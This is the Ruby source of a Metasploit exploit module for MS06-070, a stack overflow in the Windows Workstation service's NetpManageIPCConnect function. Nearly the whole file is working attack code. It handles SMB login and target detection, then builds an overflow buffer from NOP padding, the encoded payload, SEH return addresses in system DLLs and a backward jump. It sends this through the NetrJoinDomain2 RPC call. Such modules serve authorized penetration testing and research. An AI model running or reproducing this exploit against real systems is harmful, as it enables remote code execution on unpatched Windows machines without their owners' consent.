Path: blob/master/modules/exploits/windows/smb/ms06_070_wkssvc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking # Requires valid/working DOMAIN + DC

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Exploit::Seh

  # Module metadata and user options.
  #
  # The Targets table is positional: index 0 is auto-detection, index 1 is
  # Windows 2000 SP4 and index 2 is Windows XP SP0/SP1. +exploit+ selects
  # targets[1] / targets[2] by those positions, so keep the order stable.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the NetApi32 NetpManageIPCConnect
        function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.

        In order to exploit this vulnerability, you must specify the name of a
        valid Windows DOMAIN. It may be possible to satisfy this condition by using
        a custom DNS and LDAP setup, however that method is not covered here.

        Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator
        credentials are required to reach the vulnerable code. Windows XP SP1 only
        requires valid user credentials. Also, testing shows that a machine already
        joined to a domain is not exploitable.
      },
      'Author'         =>
        [
          'jduck'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-4691' ],
          [ 'OSVDB', '30263' ],
          [ 'BID', '20985' ],
          [ 'MSB', 'MS06-070' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic Targetting', { } ],
          [ 'Windows 2000 SP4',
            {
              'Offset' => (1058*2),
              'Ret'    => 0x75022ac4 # pop/pop/ret in ws2help.dll
            }
          ],
          [ 'Windows XP SP0/SP1',
            {
              'Offset' => (1290*2),
              'Ret'    => 0x71ab21cd # pop/pop/ret in ws2_32.dll
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2006-11-14'))

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use.", 'WKSSVC']),
        # NOTE: a valid domain name is required. See description.
        OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])
      ])

    # The SMB dialect is fixed by +exploit+ (connect(versions: [1])), so the
    # user-facing protocol-version option is removed rather than ignored.
    deregister_options('SMB::ProtocolVersion')
  end

  # Connects over SMB, chooses a target, binds to the Workstation service
  # pipe and sends the NetrJoinDomain2 request that triggers the overflow.
  #
  # Aborts via fail_with when no target can be chosen from the peer OS
  # string, or when the XP probe below reports error 0xc0000022.
  def exploit

    # SMB1 only; see the deregister_options call in +initialize+.
    connect(versions: [1])
    smb_login()

    mytarget = nil
    if (target.name =~ /Automatic/)
      case smb_peer_os()
      when 'Windows 5.0'
        print_status("Detected a Windows 2000 target")
        mytarget = targets[1]
      when 'Windows 5.1'
        # Opening \SRVSVC is a probe only: error 0xc0000022 is treated as the
        # SP2 "Administrator required" case and aborts; any other error is
        # reported and the XP target is still used.
        begin
          smb_create("\\SRVSVC")
          print_status("Detected a Windows XP SP0/SP1 target")
        rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
          if (e.error_code == 0xc0000022)
            # NOTE(review): Failure::NoAccess would describe this condition
            # more precisely than Failure::Unknown.
            fail_with(Failure::Unknown, "Windows XP SP2 requires Administrator privileges!")
          end
          print_status("Detected a Windows XP target (unknown patch level)")
        end
        mytarget = targets[2]
      else
        fail_with(Failure::NoTarget, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
      end
    else
      mytarget = target
    end

    # Workstation service interface, reached over the named pipe given by
    # SMBPIPE (default WKSSVC).
    handle = dcerpc_handle(
      '6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )

    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    print_status("Building the stub data...")

    # Oversized host-name field, sized by the target's Offset: NOP padding,
    # the encoded payload, the SEH record built from the target's Ret, and a
    # backward jump of `distance` bytes. make_nops is given the remaining
    # room, so a payload longer than Offset would make the length negative.
    distance = mytarget['Offset']
    hostname = make_nops(distance - payload.encoded.length)
    hostname << payload.encoded
    hostname << generate_seh_record(mytarget.ret)
    hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

    # Domain-name argument: DOMAIN followed by the host-name buffer and 3000
    # random alphanumerics, converted with Rex::Text.to_unicode, then a
    # two-byte terminator.
    name = datastore['DOMAIN'] + "\\\\L"
    name = Rex::Text.to_unicode(name)
    name << hostname
    name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)
    name << "\x00\x00"

    # Argument order follows the NetrJoinDomain2 IDL quoted at the end of
    # this file: server name, domain name, two optional strings, the
    # struct pointer (presumably encoded as a NULL referent here) and the
    # final long.
    stub =
      NDR.uwstring("\\\\#{datastore['RHOST']}") +
      NDR.UnicodeConformantVaryingStringPreBuilt(name) +
      NDR.uwstring("") +
      NDR.uwstring("") +
      NDR.long(0) +
      NDR.long(1)

    print_status("Calling the vulnerable function...")

    # Opnum 0x16 (NetrJoinDomain2, per the IDL note below). The service is
    # not expected to answer once the overflow fires, so a missing response
    # or a STATUS_PIPE_DISCONNECTED error is accepted; anything else
    # propagates.
    begin
      dcerpc.call(0x16, stub)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    rescue => e
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
        raise e
      end
    end

    # Cleanup
    handler
    disconnect
  end
end



=begin

The IDL for NetrJoinDomain2 looks like this:
long _NetrJoinDomain2@28 (
  [in][unique][string] wchar_t * arg_1,
  [in][string] wchar_t * arg_2,
  [in][unique][string] wchar_t * arg_3,
  [in][unique][string] wchar_t * arg_4,
  [in][unique] struct_C * arg_5,
  [in] long arg_6
);


1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN
2. <-- dns server - response including answer and additional record.
  answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389
  additional: IN.A address of whateverserver.DOMAIN
3. --> ldap server - baseObject query with filter/attributes:
  - filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))
  - attributes: AttributeDescriptionList: NetLogon
4. <-- ldap server - searchResDone success, attributes data
  - PartialAttributeList netlogon - 1 item
    - type 23, flags 0x1fd, domain GUID,
      forest, domain, hostname, netbios domain, netbios hostname,
      user, site, client site, version, lmtoken, nttoken
5. validated.

=end

